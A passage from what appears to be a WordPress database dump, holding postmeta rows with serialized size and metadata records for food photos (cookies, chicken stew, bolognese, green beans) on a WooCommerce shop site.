e/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"Choc_balls2_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"Choc_balls2_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"Choc_balls2_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"Choc_balls2_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"Choc_balls2_880x-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"Choc_balls2_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:28:\"Choc_balls2_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:28:\"Choc_balls2_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:28:\"Choc_balls2_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:28:\"Choc_balls2_880x-550x587.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"Choc_balls2_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"Choc_balls2_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"Choc_balls2_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1413560747\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12209,4976,'_wp_attached_file','2020/04/cookie_landscape_880x.jpg'),(12210,4976,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:879;s:6:\"height\";i:586;s:4:\"file\";s:33:\"2020/04/cookie_landscape_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"cookie_landscape_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"cookie_landscape_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"cookie_landscape_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"cookie_landscape_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"cookie_landscape_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"cookie_landscape_880x-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:33:\"cookie_landscape_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:33:\"cookie_landscape_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:33:\"cookie_landscape_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:33:\"cookie_landscape_880x-879x550.jpg\";s:5:\"width\";i:879;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:33:\"cookie_landscape_880x-550x586.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:586;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:33:\"cookie_landscape_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"cookie_landscape_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"cookie_landscape_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1466076419\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12211,4977,'_wp_attached_file','2020/04/creamy_chicken_stew_880x.jpg'),(12212,4977,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:413;s:4:\"file\";s:36:\"2020/04/creamy_chicken_stew_880x.jpg\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:36:\"creamy_chicken_stew_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"creamy_chicken_stew_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:36:\"creamy_chicken_stew_880x-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"creamy_chicken_stew_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"creamy_chicken_stew_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:36:\"creamy_chicken_stew_880x-618x300.jpg\";s:5:\"width\";i:618;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:36:\"creamy_chicken_stew_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:36:\"creamy_chicken_stew_880x-550x413.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:413;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:36:\"creamy_chicken_stew_880x-550x413.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:413;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:36:\"creamy_chicken_stew_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:36:\"creamy_chicken_stew_880x-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"creamy_chicken_stew_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12213,4978,'_wp_attached_file','2020/04/maple_sticky_chicken_880x.jpg'),(12214,4978,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:427;s:4:\"file\";s:37:\"2020/04/maple_sticky_chicken_880x.jpg\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"maple_sticky_chicken_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"maple_sticky_chicken_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:37:\"maple_sticky_chicken_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"maple_sticky_chicken_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"maple_sticky_chicken_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:37:\"maple_sticky_chicken_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:37:\"maple_sticky_chicken_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:37:\"maple_sticky_chicken_880x-550x427.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:37:\"maple_sticky_chicken_880x-550x427.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"maple_sticky_chicken_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:37:\"maple_sticky_chicken_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"maple_sticky_chicken_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12215,4979,'_wp_attached_file','2020/04/salad_pot_land_web_880x.jpg'),(12216,4979,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:587;s:4:\"file\";s:35:\"2020/04/salad_pot_land_web_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"salad_pot_land_web_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"salad_pot_land_web_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"salad_pot_land_web_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"salad_pot_land_web_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"salad_pot_land_web_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"salad_pot_land_web_880x-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:35:\"salad_pot_land_web_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:35:\"salad_pot_land_web_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:35:\"salad_pot_land_web_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:35:\"salad_pot_land_web_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:35:\"salad_pot_land_web_880x-550x587.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"salad_pot_land_web_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"salad_pot_land_web_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"salad_pot_land_web_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:9:\"946684822\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12219,4750,'_thumbnail_id','4977'),(12224,4749,'_thumbnail_id','4974'),(12229,4745,'_thumbnail_id','4973'),(12234,4746,'_thumbnail_id','4978'),(12239,4742,'_thumbnail_id','4979'),(12244,4738,'_thumbnail_id','4976'),(12248,4737,'_thumbnail_id','4975'),(12251,4980,'_wp_attached_file','2020/04/438EC3BA00000578-4823890-A_team_of_scientists_discovered_that_certain_gene_regulators_in_-a-1_1503682165278_880x.jpg'),(12252,4980,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:400;s:4:\"file\";s:124:\"2020/04/438EC3BA00000578-4823890-A_team_of_scientists_discovered_that_certain_gene_regulators_in_-a-1_1503682165278_880x.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:124:\"438EC3BA00000578-4823890-A_team_of_scientists_discovered_that_certain_gene_regulators_in_-a-1_1503682165278_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:124:\"438EC3BA00000578-4823890-A_team_of_scientists_discovered_that_certain_gene_regulators_in_-a-1_1503682165278_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:124:\"438EC3BA00000578-4823890-A_team_of_scientists_discovered_that_certain_gene_regulators_in_-a-1_1503682165278_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:124:\"438EC3BA00000578-4823890-A_team_of_scientists_discovered_that_certain_gene_regulators_in_-a-1_1503682165278_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:124:\"438EC3BA00000578-4823890-A_team_of_scientists_discovered_that_certain_gene_regulators_in_-a-1_1503682165278_880x-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:124:\"438EC3BA00000578-4823890-A_team_of_scientists_discovered_that_certain_gene_regulators_in_-a-1_1503682165278_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:124:\"438EC3BA00000578-4823890-A_team_of_scientists_discovered_that_certain_gene_regulators_in_-a-1_1503682165278_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:124:\"438EC3BA00000578-4823890-A_team_of_scientists_discovered_that_certain_gene_regulators_in_-a-1_1503682165278_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:124:\"438EC3BA00000578-4823890-A_team_of_scientists_discovered_that_certain_gene_regulators_in_-a-1_1503682165278_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:124:\"438EC3BA00000578-4823890-A_team_of_scientists_discovered_that_certain_gene_regulators_in_-a-1_1503682165278_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12253,4981,'_wp_attached_file','2020/04/bolognese_880x.jpg'),(12254,4981,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:400;s:4:\"file\";s:26:\"2020/04/bolognese_880x.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"bolognese_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"bolognese_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"bolognese_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"bolognese_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:26:\"bolognese_880x-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:26:\"bolognese_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:26:\"bolognese_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:26:\"bolognese_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:26:\"bolognese_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"bolognese_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12255,4982,'_wp_attached_file','2020/04/chicken_skewers_landscape_880x.jpg'),(12256,4982,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:400;s:4:\"file\";s:42:\"2020/04/chicken_skewers_landscape_880x.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:42:\"chicken_skewers_landscape_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:42:\"chicken_skewers_landscape_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:42:\"chicken_skewers_landscape_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:42:\"chicken_skewers_landscape_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:42:\"chicken_skewers_landscape_880x-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:42:\"chicken_skewers_landscape_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:42:\"chicken_skewers_landscape_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:42:\"chicken_skewers_landscape_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:42:\"chicken_skewers_landscape_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:42:\"chicken_skewers_landscape_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12257,4983,'_wp_attached_file','2020/04/green_beans_880x.jpg'),(12258,4983,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:400;s:4:\"file\";s:28:\"2020/04/green_beans_880x.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"green_beans_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"green_beans_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"green_beans_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"green_beans_880x-150x150.jpg\";s:5:\"width\";i:150;s